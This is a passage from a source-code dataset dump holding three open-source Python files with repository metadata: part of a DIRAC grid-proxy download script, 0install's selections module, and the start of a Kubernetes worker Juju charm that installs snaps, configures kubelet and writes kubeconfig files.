  def automaticVOMS( self, arg ):
    self.enableVOMS = True
    return DIRAC.S_OK()

  def setVOMSAttr( self, arg ):
    self.enableVOMS = True
    self.vomsAttr = arg
    return DIRAC.S_OK()

  def registerCLISwitches( self ):
    Script.registerSwitch( "v:", "valid=", "Valid HH:MM for the proxy. By default is 24 hours", self.setProxyLifeTime )
    Script.registerSwitch( "l", "limited", "Get a limited proxy", self.setLimited )
    Script.registerSwitch( "u:", "out=", "File to write as proxy", self.setProxyLocation )
    Script.registerSwitch( "a", "voms", "Get proxy with VOMS extension mapped to the DIRAC group", self.automaticVOMS )
    Script.registerSwitch( "m:", "vomsAttr=", "VOMS attribute to require", self.setVOMSAttr )

params = Params()
params.registerCLISwitches()

Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1],
                                     'Usage:',
                                     '  %s [option|cfgfile] ... <DN|user> group' % Script.scriptName,
                                     'Arguments:',
                                     '  DN:    DN of the user',
                                     '  user:  DIRAC user name (will fail if there is more than 1 DN registered)',
                                     '  group: DIRAC group name' ] ) )

Script.parseCommandLine( ignoreErrors = True )
args = Script.getPositionalArgs()

if len( args ) != 2:
  Script.showHelp()

userGroup = str( args[1] )
userDN = str( args[0] )
userName = False
if userDN.find( "/" ) != 0:
  userName = userDN
  retVal = Registry.getDNForUsername( userName )
  if not retVal[ 'OK' ]:
    print("Cannot discover DN for username %s\n\t%s" % (userName, retVal['Message']))
    DIRAC.exit( 2 )
  DNList = retVal[ 'Value' ]
  if len( DNList ) > 1:
    print("Username %s has more than one DN registered" % userName)
    ind = 0
    for dn in DNList:
      print("%d %s" % (ind, dn))
      ind += 1
    inp = raw_input( "Which DN do you want to download? [default 0] " )
    if not inp:
      inp = 0
    else:
      inp = int( inp )
    userDN = DNList[inp]
  else:
    userDN = DNList[0]

if not params.proxyPath:
  if not userName:
    result = Registry.getUsernameForDN( userDN )
    if not result[ 'OK' ]:
      print("DN '%s' is not registered in DIRAC" % userDN)
      DIRAC.exit( 2 )
    userName = result[ 'Value' ]
  params.proxyPath = "%s/proxy.%s.%s" % ( os.getcwd(), userName, userGroup )

if params.enableVOMS:
  result = gProxyManager.downloadVOMSProxy( userDN, userGroup, limited = params.limited,
                                            requiredTimeLeft = params.proxyLifeTime,
                                            requiredVOMSAttribute = params.vomsAttr )
else:
  result = gProxyManager.downloadProxy( userDN, userGroup, limited = params.limited,
                                        requiredTimeLeft = params.proxyLifeTime )
if not result['OK']:
  print('Proxy file cannot be retrieved: %s' % result['Message'])
  DIRAC.exit( 2 )
chain = result[ 'Value' ]
result = chain.dumpAllToFile( params.proxyPath )
if not result['OK']:
  print('Proxy file cannot be written to %s: %s' % (params.proxyPath, result['Message']))
  DIRAC.exit( 2 )
print("Proxy downloaded to %s" % params.proxyPath)
DIRAC.exit( 0 )
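# Example (editor's sketch; the user and group names are hypothetical):
#
#   $ dirac-admin-get-proxy --valid 12:00 --voms jdoe dirac_user
#
# downloads a 12-hour VOMS-enabled proxy for user "jdoe" in group
# "dirac_user" into ./proxy.jdoe.dirac_user unless --out is given.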
petricm/DIRAC
FrameworkSystem/scripts/dirac-admin-get-proxy.py
Python
gpl-3.0
4,433
[ "DIRAC" ]
3d706458477e411fddf682efee54810601b853d9df8bc56a8876b3ffc7e47d03
""" Load and save a set of chosen implementations. @since: 0.27 """ # Copyright (C) 2009, Thomas Leonard # See the README file for details, or visit http://0install.net. import os from zeroinstall import _, zerostore from zeroinstall.injector import model from zeroinstall.injector.policy import get_deprecated_singleton_config from zeroinstall.injector.model import process_binding, process_depends, binding_names, Command from zeroinstall.injector.namespaces import XMLNS_IFACE from zeroinstall.injector.qdom import Element, Prefixes from zeroinstall.support import tasks, basestring class Selection(object): """A single selected implementation in a L{Selections} set. @ivar dependencies: list of dependencies @type dependencies: [L{model.Dependency}] @ivar attrs: XML attributes map (name is in the format "{namespace} {localName}") @type attrs: {str: str} @ivar version: the implementation's version number @type version: str""" interface = property(lambda self: self.attrs['interface']) id = property(lambda self: self.attrs['id']) version = property(lambda self: self.attrs['version']) feed = property(lambda self: self.attrs.get('from-feed', self.interface)) main = property(lambda self: self.attrs.get('main', None)) @property def local_path(self): local_path = self.attrs.get('local-path', None) if local_path: return local_path if self.id.startswith('/'): return self.id return None def __repr__(self): """@rtype: str""" return self.id def is_available(self, stores): """Is this implementation available locally? (a local implementation or a cached ZeroInstallImplementation) @rtype: bool @since: 0.53""" path = self.local_path if path is not None: return os.path.exists(path) path = stores.lookup_maybe(self.digests) return path is not None def get_path(self, stores, missing_ok = False): """Return the root directory of this implementation. For local implementations, this is L{local_path}. For cached implementations, this is the directory in the cache. 
@param stores: stores to search @type stores: L{zerostore.Stores} @param missing_ok: return None for uncached implementations @type missing_ok: bool @return: the path of the directory @rtype: str | None @since: 1.8""" if self.local_path is not None: return self.local_path if not self.digests: # (for now, we assume this is always an error, even for missing_ok) raise model.SafeException("No digests for {feed} {version}".format(feed = self.feed, version = self.version)) if missing_ok: return stores.lookup_maybe(self.digests) else: return stores.lookup_any(self.digests) class ImplSelection(Selection): """A Selection created from an Implementation""" __slots__ = ['impl', 'dependencies', 'attrs', '_used_commands'] def __init__(self, iface_uri, impl, dependencies): """@type iface_uri: str @type impl: L{zeroinstall.injector.model.Implementation} @type dependencies: [L{zeroinstall.injector.model.Dependency}]""" assert impl self.impl = impl self.dependencies = dependencies self._used_commands = {} # name -> Command attrs = impl.metadata.copy() attrs['id'] = impl.id attrs['version'] = impl.get_version() attrs['interface'] = iface_uri attrs['from-feed'] = impl.feed.url if impl.local_path: attrs['local-path'] = impl.local_path self.attrs = attrs @property def bindings(self): return self.impl.bindings @property def digests(self): return self.impl.digests def get_command(self, name): assert name in self._used_commands, "internal error: '{command}' not in my commands list".format(command = name) return self._used_commands[name] def get_commands(self): return self._used_commands class XMLSelection(Selection): """A Selection created by reading an XML selections document. @ivar digests: a list of manifest digests @type digests: [str] """ __slots__ = ['bindings', 'dependencies', 'attrs', 'digests', 'commands'] def __init__(self, dependencies, bindings = None, attrs = None, digests = None, commands = None): """@type dependencies: [L{zeroinstall.injector.model.Dependency}] @type bindings: [L{zeroinstall.injector.model.Binding}] | None @type attrs: {str: str} | None @type digests: [str] | None @type commands: {str: L{Command}} | None""" if bindings is None: bindings = [] if digests is None: digests = [] self.dependencies = dependencies self.bindings = bindings self.attrs = attrs self.digests = digests self.commands = commands assert self.interface assert self.id assert self.version assert self.feed def get_command(self, name): """@type name: str @rtype: L{Command}""" if name not in self.commands: raise model.SafeException("Command '{name}' not present in selections for {iface}".format(name = name, iface = self.interface)) return self.commands[name] def get_commands(self): """@rtype: {str: L{Command}}""" return self.commands class Selections(object): """ A selected set of components which will make up a complete program. @ivar interface: the interface of the program @type interface: str @ivar command: the command to run on 'interface' @type command: str @ivar selections: the selected implementations @type selections: {str: L{Selection}} """ __slots__ = ['interface', 'selections', 'command'] def __init__(self, source): """Constructor. 
@param source: a map of implementations, policy or selections document @type source: L{Element}""" self.selections = {} self.command = None if source is None: # (Solver will fill everything in) pass elif isinstance(source, Element): self._init_from_qdom(source) else: raise Exception(_("Source not a qdom.Element!")) def _init_from_qdom(self, root): """Parse and load a selections document. @param root: a saved set of selections. @type root: L{Element}""" self.interface = root.getAttribute('interface') self.command = root.getAttribute('command') if self.interface is None: raise model.SafeException(_("Not a selections document (no 'interface' attribute on root)")) old_commands = [] for selection in root.childNodes: if selection.uri != XMLNS_IFACE: continue if selection.name != 'selection': if selection.name == 'command': old_commands.append(Command(selection, None)) continue requires = [] bindings = [] digests = [] commands = {} for elem in selection.childNodes: if elem.uri != XMLNS_IFACE: continue if elem.name in binding_names: bindings.append(process_binding(elem)) elif elem.name == 'requires': dep = process_depends(elem, None) requires.append(dep) elif elem.name == 'manifest-digest': for aname, avalue in elem.attrs.items(): digests.append(zerostore.format_algorithm_digest_pair(aname, avalue)) elif elem.name == 'command': name = elem.getAttribute('name') assert name, "Missing name attribute on <command>" commands[name] = Command(elem, None) # For backwards compatibility, allow getting the digest from the ID sel_id = selection.attrs['id'] local_path = selection.attrs.get("local-path", None) if (not digests and not local_path) and '=' in sel_id: alg = sel_id.split('=', 1)[0] if alg in ('sha1', 'sha1new', 'sha256'): digests.append(sel_id) iface_uri = selection.attrs['interface'] s = XMLSelection(requires, bindings, selection.attrs, digests, commands) self.selections[iface_uri] = s if self.command is None: # Old style selections document if old_commands: # 0launch 0.52 to 1.1 self.command = 'run' iface = self.interface for command in old_commands: command.qdom.attrs['name'] = 'run' self.selections[iface].commands['run'] = command runner = command.get_runner() if runner: iface = runner.interface else: iface = None else: # 0launch < 0.51 root_sel = self.selections[self.interface] main = root_sel.attrs.get('main', None) if main is not None: root_sel.commands['run'] = Command(Element(XMLNS_IFACE, 'command', {'path': main, 'name': 'run'}), None) self.command = 'run' elif self.command == '': # New style, but no command requested self.command = None assert not old_commands, "<command> list in new-style selections document!" def toDOM(self): """Create a DOM document for the selected implementations. The document gives the URI of the root, plus each selected implementation. For each selected implementation, we record the ID, the version, the URI and (if different) the feed URL. We also record all the bindings needed. 
@return: a new DOM Document""" from xml.dom import minidom, XMLNS_NAMESPACE assert self.interface impl = minidom.getDOMImplementation() doc = impl.createDocument(XMLNS_IFACE, "selections", None) root = doc.documentElement root.setAttributeNS(XMLNS_NAMESPACE, 'xmlns', XMLNS_IFACE) root.setAttributeNS(None, 'interface', self.interface) root.setAttributeNS(None, 'command', self.command or "") prefixes = Prefixes(XMLNS_IFACE) for iface, selection in sorted(self.selections.items()): selection_elem = doc.createElementNS(XMLNS_IFACE, 'selection') selection_elem.setAttributeNS(None, 'interface', selection.interface) root.appendChild(selection_elem) for name, value in selection.attrs.items(): if ' ' in name: ns, localName = name.split(' ', 1) prefixes.setAttributeNS(selection_elem, ns, localName, value) elif name == 'stability': pass elif name == 'from-feed': # Don't bother writing from-feed attr if it's the same as the interface if value != selection.attrs['interface']: selection_elem.setAttributeNS(None, name, value) elif name not in ('main', 'self-test'): # (replaced by <command>) selection_elem.setAttributeNS(None, name, value) if selection.digests: manifest_digest = doc.createElementNS(XMLNS_IFACE, 'manifest-digest') for digest in selection.digests: aname, avalue = zerostore.parse_algorithm_digest_pair(digest) assert ':' not in aname manifest_digest.setAttribute(aname, avalue) selection_elem.appendChild(manifest_digest) for b in selection.bindings: selection_elem.appendChild(b._toxml(doc, prefixes)) for dep in selection.dependencies: if not isinstance(dep, model.InterfaceDependency): continue dep_elem = doc.createElementNS(XMLNS_IFACE, 'requires') dep_elem.setAttributeNS(None, 'interface', dep.interface) selection_elem.appendChild(dep_elem) for m in dep.metadata: parts = m.split(' ', 1) if len(parts) == 1: ns = None localName = parts[0] dep_elem.setAttributeNS(None, localName, dep.metadata[m]) else: ns, localName = parts prefixes.setAttributeNS(dep_elem, ns, localName, dep.metadata[m]) for b in dep.bindings: dep_elem.appendChild(b._toxml(doc, prefixes)) for command in selection.get_commands().values(): selection_elem.appendChild(command._toxml(doc, prefixes)) for ns, prefix in prefixes.prefixes.items(): root.setAttributeNS(XMLNS_NAMESPACE, 'xmlns:' + prefix, ns) return doc def __repr__(self): return "Selections for " + self.interface def get_unavailable_selections(self, config, include_packages): """Find those selections which are not present. Local implementations are available if their directory exists. Other 0install implementations are available if they are in the cache. Package implementations are available if the Distribution says so. @param include_packages: whether to include <package-implementation>s @type include_packages: bool @rtype: [Selection] @since: 1.16""" iface_cache = config.iface_cache stores = config.stores # Check that every required selection is cached def needs_download(sel): if sel.id.startswith('package:'): if not include_packages: return False feed = iface_cache.get_feed(sel.feed) if not feed: return False impl = feed.implementations.get(sel.id, None) return impl is None or not impl.installed elif sel.local_path: return False else: return sel.get_path(stores, missing_ok = True) is None return [sel for sel in self.selections.values() if needs_download(sel)] def download_missing(self, config, _old = None, include_packages = False): """Check all selected implementations are available. Download any that are not present. 
Since native distribution packages are usually only available in a single version, which is unlikely to be the one in the selections document, we ignore them by default. Note: package implementations (distribution packages) are ignored. @param config: used to get iface_cache, stores and fetcher @param include_packages: also try to install native packages (since 1.5) @type include_packages: bool @rtype: L{zeroinstall.support.tasks.Blocker} | None""" if _old: config = get_deprecated_singleton_config() iface_cache = config.iface_cache stores = config.stores needed_downloads = self.get_unavailable_selections(config, include_packages) if not needed_downloads: return if config.network_use == model.network_offline: from zeroinstall import NeedDownload raise NeedDownload(', '.join([str(x) for x in needed_downloads])) @tasks.async def download(): # We're missing some. For each one, get the feed it came from # and find the corresponding <implementation> in that. This will # tell us where to get it from. # Note: we look for an implementation with the same ID. Maybe we # should check it has the same digest(s) too? needed_impls = [] for sel in needed_downloads: feed_url = sel.attrs.get('from-feed', None) or sel.attrs['interface'] feed = iface_cache.get_feed(feed_url) if feed is None or sel.id not in feed.implementations: fetch_feed = config.fetcher.download_and_import_feed(feed_url, iface_cache) yield fetch_feed tasks.check(fetch_feed) feed = iface_cache.get_feed(feed_url) assert feed, "Failed to get feed for %s" % feed_url impl = feed.implementations[sel.id] needed_impls.append(impl) fetch_impls = config.fetcher.download_impls(needed_impls, stores) yield fetch_impls tasks.check(fetch_impls) return download() # These (deprecated) methods are to make a Selections object look like the old Policy.implementation map... def __getitem__(self, key): # Deprecated """@type key: str @rtype: L{ImplSelection}""" if isinstance(key, basestring): return self.selections[key] sel = self.selections[key.uri] return sel and sel.impl def iteritems(self): # Deprecated iface_cache = get_deprecated_singleton_config().iface_cache for (uri, sel) in self.selections.items(): yield (iface_cache.get_interface(uri), sel and sel.impl) def values(self): # Deprecated """@rtype: L{zeroinstall.injector.model.Implementation}""" for (uri, sel) in self.selections.items(): yield sel and sel.impl def __iter__(self): # Deprecated iface_cache = get_deprecated_singleton_config().iface_cache for (uri, sel) in self.selections.items(): yield iface_cache.get_interface(uri) def get(self, iface, if_missing): # Deprecated """@type iface: L{zeroinstall.injector.model.Interface} @rtype: L{zeroinstall.injector.model.Implementation}""" sel = self.selections.get(iface.uri, None) if sel: return sel.impl return if_missing def copy(self): # Deprecated s = Selections(None) s.interface = self.interface s.selections = self.selections.copy() return s def items(self): # Deprecated return list(self.iteritems()) @property def commands(self): i = self.interface c = self.command commands = [] while c is not None: sel = self.selections[i] command = sel.get_command(c) commands.append(command) runner = command.get_runner() if not runner: break i = runner.metadata['interface'] c = runner.qdom.attrs.get('command', 'run') return commands
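# Editor's sketch (illustrative, not part of the module): round-tripping a
# selections document through this class; ``qdom.parse`` is the parser used
# for these documents elsewhere in zeroinstall.
#
#     from zeroinstall.injector import qdom
#     with open('selections.xml', 'rb') as stream:
#         sels = Selections(qdom.parse(stream))
#     print(sels.interface, sels.command)
#     doc = sels.toDOM()  # back to XML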
res2k/0install
zeroinstall/injector/selections.py
Python
lgpl-2.1
16,010
[ "VisIt" ]
08383e725e0028e904c3567b2dfa61020eff9ec377359f6a5b66ab0475affc94
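The toDOM code in the row above builds its XML document by hand with xml.dom.minidom, including writing the xmlns declarations itself, because minidom does not emit namespace declarations automatically. Below is a minimal stand-alone sketch of that pattern using only the standard library; the namespace URI, interface URI, and attribute values are invented for illustration and are not part of the 0install API.

# Sketch of the minidom namespace pattern used by Selections.toDOM().
# EXAMPLE_NS and the attribute values are hypothetical placeholders.
from xml.dom import minidom, XMLNS_NAMESPACE

EXAMPLE_NS = 'http://example.com/ns/demo'  # invented namespace URI

impl = minidom.getDOMImplementation()
doc = impl.createDocument(EXAMPLE_NS, 'selections', None)
root = doc.documentElement

# minidom does not serialize xmlns declarations for you, so they are
# written explicitly as attributes in the XMLNS namespace, exactly as
# toDOM() does above.
root.setAttributeNS(XMLNS_NAMESPACE, 'xmlns', EXAMPLE_NS)
root.setAttributeNS(None, 'interface', 'http://example.com/prog.xml')

# Child elements are created in the same namespace and appended.
sel = doc.createElementNS(EXAMPLE_NS, 'selection')
sel.setAttributeNS(None, 'id', 'sha256=abc123')
root.appendChild(sel)

print(doc.toprettyxml(indent='  '))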
#!/usr/bin/env python # Copyright 2015 The Kubernetes Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import os import random import shutil import subprocess import time from shlex import split from subprocess import check_call, check_output from subprocess import CalledProcessError from socket import gethostname, getfqdn from charms import layer from charms.layer import snap from charms.reactive import hook from charms.reactive import set_state, remove_state, is_state from charms.reactive import when, when_any, when_not from charms.kubernetes.common import get_version from charms.reactive.helpers import data_changed, any_file_changed from charms.templating.jinja2 import render from charmhelpers.core import hookenv, unitdata from charmhelpers.core.host import service_stop, service_restart from charmhelpers.contrib.charmsupport import nrpe # Override the default nagios shortname regex to allow periods, which we # need because our bin names contain them (e.g. 'snap.foo.daemon'). The # default regex in charmhelpers doesn't allow periods, but nagios itself does. nrpe.Check.shortname_re = '[\.A-Za-z0-9-_]+$' kubeconfig_path = '/root/cdk/kubeconfig' kubeproxyconfig_path = '/root/cdk/kubeproxyconfig' kubeclientconfig_path = '/root/.kube/config' os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin') db = unitdata.kv() @hook('upgrade-charm') def upgrade_charm(): # Trigger removal of PPA docker installation if it was previously set. set_state('config.changed.install_from_upstream') hookenv.atexit(remove_state, 'config.changed.install_from_upstream') cleanup_pre_snap_services() check_resources_for_upgrade_needed() # Remove the RC for nginx ingress if it exists if hookenv.config().get('ingress'): kubectl_success('delete', 'rc', 'nginx-ingress-controller') # Remove gpu.enabled state so we can reconfigure gpu-related kubelet flags, # since they can differ between k8s versions if is_state('kubernetes-worker.gpu.enabled'): remove_state('kubernetes-worker.gpu.enabled') try: disable_gpu() except ApplyNodeLabelFailed: # Removing node label failed. Probably the master is unavailable. # Proceed with the upgrade in hope GPUs will still be there. hookenv.log('Failed to remove GPU labels. 
Proceed with upgrade.') remove_state('kubernetes-worker.cni-plugins.installed') remove_state('kubernetes-worker.config.created') remove_state('kubernetes-worker.ingress.available') remove_state('worker.auth.bootstrapped') set_state('kubernetes-worker.restart-needed') def get_snap_resource_paths(): resources = ['kubectl', 'kubelet', 'kube-proxy'] return [hookenv.resource_get(resource) for resource in resources] def check_resources_for_upgrade_needed(): hookenv.status_set('maintenance', 'Checking resources') if any_file_changed(get_snap_resource_paths()): set_upgrade_needed() def set_upgrade_needed(): set_state('kubernetes-worker.snaps.upgrade-needed') config = hookenv.config() require_manual = config.get('require-manual-upgrade') if not require_manual: set_state('kubernetes-worker.snaps.upgrade-specified') def cleanup_pre_snap_services(): # remove old states remove_state('kubernetes-worker.components.installed') # disable old services services = ['kubelet', 'kube-proxy'] for service in services: hookenv.log('Stopping {0} service.'.format(service)) service_stop(service) # cleanup old files files = [ "/lib/systemd/system/kubelet.service", "/lib/systemd/system/kube-proxy.service", "/etc/default/kube-default", "/etc/default/kubelet", "/etc/default/kube-proxy", "/srv/kubernetes", "/usr/local/bin/kubectl", "/usr/local/bin/kubelet", "/usr/local/bin/kube-proxy", "/etc/kubernetes" ] for file in files: if os.path.isdir(file): hookenv.log("Removing directory: " + file) shutil.rmtree(file) elif os.path.isfile(file): hookenv.log("Removing file: " + file) os.remove(file) @when_not('kubernetes-worker.snap.resources-available') def check_snap_resources(): for path in get_snap_resource_paths(): if not path or not os.path.exists(path): msg = 'Missing snap resources.' hookenv.status_set('blocked', msg) return set_state('kubernetes-worker.snap.resources-available') set_state('kubernetes-worker.snaps.upgrade-specified') @when('config.changed.channel') def channel_changed(): set_upgrade_needed() @when('kubernetes-worker.snaps.upgrade-needed', 'kubernetes-worker.snap.resources-available') @when_not('kubernetes-worker.snaps.upgrade-specified') def upgrade_needed_status(): msg = 'Needs manual upgrade, run the upgrade action' hookenv.status_set('blocked', msg) @when('kubernetes-worker.snap.resources-available', 'kubernetes-worker.snaps.upgrade-specified') def install_snaps(): any_file_changed(get_snap_resource_paths()) channel = hookenv.config('channel') hookenv.status_set('maintenance', 'Installing kubectl snap') snap.install('kubectl', channel=channel, classic=True) hookenv.status_set('maintenance', 'Installing kubelet snap') snap.install('kubelet', channel=channel, classic=True) hookenv.status_set('maintenance', 'Installing kube-proxy snap') snap.install('kube-proxy', channel=channel, classic=True) set_state('kubernetes-worker.snaps.installed') set_state('kubernetes-worker.restart-needed') remove_state('kubernetes-worker.snaps.upgrade-needed') remove_state('kubernetes-worker.snaps.upgrade-specified') @hook('stop') def shutdown(): ''' When this unit is destroyed: - delete the current node - stop the worker services ''' try: if os.path.isfile(kubeconfig_path): kubectl('delete', 'node', gethostname().lower()) except CalledProcessError: hookenv.log('Failed to unregister node.') service_stop('snap.kubelet.daemon') service_stop('snap.kube-proxy.daemon') @when('docker.available') @when_not('kubernetes-worker.cni-plugins.installed') def install_cni_plugins(): ''' Unpack the cni-plugins resource ''' charm_dir = 
os.getenv('CHARM_DIR') # Get the resource via resource_get try: resource_name = 'cni-{}'.format(arch()) archive = hookenv.resource_get(resource_name) except Exception: message = 'Error fetching the cni resource.' hookenv.log(message) hookenv.status_set('blocked', message) return if not archive: hookenv.log('Missing cni resource.') hookenv.status_set('blocked', 'Missing cni resource.') return # Handle null resource publication, we check if filesize < 1mb filesize = os.stat(archive).st_size if filesize < 1000000: hookenv.status_set('blocked', 'Incomplete cni resource.') return hookenv.status_set('maintenance', 'Unpacking cni resource.') unpack_path = '{}/files/cni'.format(charm_dir) os.makedirs(unpack_path, exist_ok=True) cmd = ['tar', 'xfvz', archive, '-C', unpack_path] hookenv.log(cmd) check_call(cmd) apps = [ {'name': 'loopback', 'path': '/opt/cni/bin'} ] for app in apps: unpacked = '{}/{}'.format(unpack_path, app['name']) app_path = os.path.join(app['path'], app['name']) install = ['install', '-v', '-D', unpacked, app_path] hookenv.log(install) check_call(install) # Used by the "registry" action. The action is run on a single worker, but # the registry pod can end up on any worker, so we need this directory on # all the workers. os.makedirs('/srv/registry', exist_ok=True) set_state('kubernetes-worker.cni-plugins.installed') @when('kubernetes-worker.snaps.installed') def set_app_version(): ''' Declare the application version to juju ''' cmd = ['kubelet', '--version'] version = check_output(cmd) hookenv.application_version_set(version.split(b' v')[-1].rstrip()) @when('kubernetes-worker.snaps.installed') @when_not('kube-control.dns.available') def notify_user_transient_status(): ''' Notify to the user we are in a transient state and the application is still converging. Potentially remotely, or we may be in a detached loop wait state ''' # During deployment the worker has to start kubelet without cluster dns # configured. If this is the first unit online in a service pool waiting # to self host the dns pod, and configure itself to query the dns service # declared in the kube-system namespace hookenv.status_set('waiting', 'Waiting for cluster DNS.') @when('kubernetes-worker.snaps.installed', 'kube-control.dns.available') @when_not('kubernetes-worker.snaps.upgrade-needed') def charm_status(kube_control): '''Update the status message with the current status of kubelet.''' update_kubelet_status() def update_kubelet_status(): ''' There are different states that the kubelet can be in, where we are waiting for dns, waiting for cluster turnup, or ready to serve applications.''' services = [ 'kubelet', 'kube-proxy' ] failing_services = [] for service in services: daemon = 'snap.{}.daemon'.format(service) if not _systemctl_is_active(daemon): failing_services.append(service) if len(failing_services) == 0: hookenv.status_set('active', 'Kubernetes worker running.') else: msg = 'Waiting for {} to start.'.format(','.join(failing_services)) hookenv.status_set('waiting', msg) def get_ingress_address(relation): try: network_info = hookenv.network_get(relation.relation_name) except NotImplementedError: network_info = [] if network_info and 'ingress-addresses' in network_info: # just grab the first one for now, maybe be more robust here? 
return network_info['ingress-addresses'][0] else: # if they don't have ingress-addresses they are running a juju that # doesn't support spaces, so just return the private address return hookenv.unit_get('private-address') @when('certificates.available', 'kube-control.connected') def send_data(tls, kube_control): '''Send the data that is required to create a server certificate for this server.''' # Use the public ip of this unit as the Common Name for the certificate. common_name = hookenv.unit_public_ip() ingress_ip = get_ingress_address(kube_control) # Create SANs that the tls layer will add to the server cert. sans = [ hookenv.unit_public_ip(), ingress_ip, gethostname() ] # Create a path safe name by removing path characters from the unit name. certificate_name = hookenv.local_unit().replace('/', '_') # Request a server cert with this information. tls.request_server_cert(common_name, sans, certificate_name) @when('kube-api-endpoint.available', 'kube-control.dns.available', 'cni.available') def watch_for_changes(kube_api, kube_control, cni): ''' Watch for configuration changes and signal if we need to restart the worker services ''' servers = get_kube_api_servers(kube_api) dns = kube_control.get_dns() cluster_cidr = cni.get_config()['cidr'] if (data_changed('kube-api-servers', servers) or data_changed('kube-dns', dns) or data_changed('cluster-cidr', cluster_cidr)): set_state('kubernetes-worker.restart-needed') @when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available', 'tls_client.ca.saved', 'tls_client.client.certificate.saved', 'tls_client.client.key.saved', 'tls_client.server.certificate.saved', 'tls_client.server.key.saved', 'kube-control.dns.available', 'kube-control.auth.available', 'cni.available', 'kubernetes-worker.restart-needed', 'worker.auth.bootstrapped') def start_worker(kube_api, kube_control, auth_control, cni): ''' Start kubelet using the provided API and DNS info.''' servers = get_kube_api_servers(kube_api) # Note that the DNS server doesn't necessarily exist at this point. We know # what its IP will eventually be, though, so we can go ahead and configure # kubelet with that info. This ensures that early pods are configured with # the correct DNS even though the server isn't ready yet. dns = kube_control.get_dns() ingress_ip = get_ingress_address(kube_control) cluster_cidr = cni.get_config()['cidr'] if cluster_cidr is None: hookenv.log('Waiting for cluster cidr.') return creds = db.get('credentials') data_changed('kube-control.creds', creds) create_config(random.choice(servers), creds) configure_kubelet(dns, ingress_ip) configure_kube_proxy(servers, cluster_cidr) set_state('kubernetes-worker.config.created') restart_unit_services() update_kubelet_status() set_state('kubernetes-worker.label-config-required') remove_state('kubernetes-worker.restart-needed') @when('cni.connected') @when_not('cni.configured') def configure_cni(cni): ''' Set worker configuration on the CNI relation. This lets the CNI subordinate know that we're the worker so it can respond accordingly. ''' cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path) @when('config.changed.ingress') def toggle_ingress_state(): ''' Ingress is a toggled state. 
Remove ingress.available if set when toggled ''' remove_state('kubernetes-worker.ingress.available') @when('docker.sdn.configured') def sdn_changed(): '''The Software Defined Network changed on the container so restart the kubernetes services.''' restart_unit_services() update_kubelet_status() remove_state('docker.sdn.configured') @when('kubernetes-worker.config.created') @when_not('kubernetes-worker.ingress.available') def render_and_launch_ingress(): ''' If configuration has ingress daemon set enabled, launch the ingress load balancer and default http backend. Otherwise attempt deletion. ''' config = hookenv.config() # If ingress is enabled, launch the ingress controller if config.get('ingress'): launch_default_ingress_controller() else: hookenv.log('Deleting the http backend and ingress.') kubectl_manifest('delete', '/root/cdk/addons/default-http-backend.yaml') kubectl_manifest('delete', '/root/cdk/addons/ingress-daemon-set.yaml') # noqa hookenv.close_port(80) hookenv.close_port(443) @when('config.changed.labels') def handle_labels_changed(): set_state('kubernetes-worker.label-config-required') @when('kubernetes-worker.label-config-required', 'kubernetes-worker.config.created') def apply_node_labels(): ''' Parse the labels configuration option and apply the labels to the node. ''' # Get the user's configured labels. config = hookenv.config() user_labels = {} for item in config.get('labels').split(' '): if '=' in item: key, val = item.split('=') user_labels[key] = val else: hookenv.log('Skipping malformed option: {}.'.format(item)) # Collect the current label state. current_labels = db.get('current_labels') or {} # Remove any labels that the user has removed from the config. for key in list(current_labels.keys()): if key not in user_labels: try: remove_label(key) del current_labels[key] db.set('current_labels', current_labels) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Add any new labels. for key, val in user_labels.items(): try: set_label(key, val) current_labels[key] = val db.set('current_labels', current_labels) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Set the juju-application label. try: set_label('juju-application', hookenv.service_name()) except ApplyNodeLabelFailed as e: hookenv.log(str(e)) return # Label configuration complete. remove_state('kubernetes-worker.label-config-required') @when_any('config.changed.kubelet-extra-args', 'config.changed.proxy-extra-args') def extra_args_changed(): set_state('kubernetes-worker.restart-needed') @when('config.changed.docker-logins') def docker_logins_changed(): """Set a flag to handle new docker login options. If docker daemon options have also changed, set a flag to ensure the daemon is restarted prior to running docker login. """ config = hookenv.config() if data_changed('docker-opts', config['docker-opts']): hookenv.log('Found new docker daemon options. 
Requesting a restart.') # State will be removed by layer-docker after restart set_state('docker.restart') set_state('kubernetes-worker.docker-login') @when('kubernetes-worker.docker-login') @when_not('docker.restart') def run_docker_login(): """Login to a docker registry with configured credentials.""" config = hookenv.config() previous_logins = config.previous('docker-logins') logins = config['docker-logins'] logins = json.loads(logins) if previous_logins: previous_logins = json.loads(previous_logins) next_servers = {login['server'] for login in logins} previous_servers = {login['server'] for login in previous_logins} servers_to_logout = previous_servers - next_servers for server in servers_to_logout: cmd = ['docker', 'logout', server] subprocess.check_call(cmd) for login in logins: server = login['server'] username = login['username'] password = login['password'] cmd = ['docker', 'login', server, '-u', username, '-p', password] subprocess.check_call(cmd) remove_state('kubernetes-worker.docker-login') set_state('kubernetes-worker.restart-needed') def arch(): '''Return the package architecture as a string. Raise an exception if the architecture is not supported by kubernetes.''' # Get the package architecture for this system. architecture = check_output(['dpkg', '--print-architecture']).rstrip() # Convert the binary result into a string. architecture = architecture.decode('utf-8') return architecture def create_config(server, creds): '''Create a kubernetes configuration for the worker unit.''' # Get the options from the tls-client layer. layer_options = layer.options('tls-client') # Get all the paths to the tls information required for kubeconfig. ca = layer_options.get('ca_certificate_path') # Create kubernetes configuration in the default location for ubuntu. create_kubeconfig('/home/ubuntu/.kube/config', server, ca, token=creds['client_token'], user='ubuntu') # Make the config dir readable by the ubuntu users so juju scp works. cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube'] check_call(cmd) # Create kubernetes configuration in the default location for root. create_kubeconfig(kubeclientconfig_path, server, ca, token=creds['client_token'], user='root') # Create kubernetes configuration for kubelet, and kube-proxy services. create_kubeconfig(kubeconfig_path, server, ca, token=creds['kubelet_token'], user='kubelet') 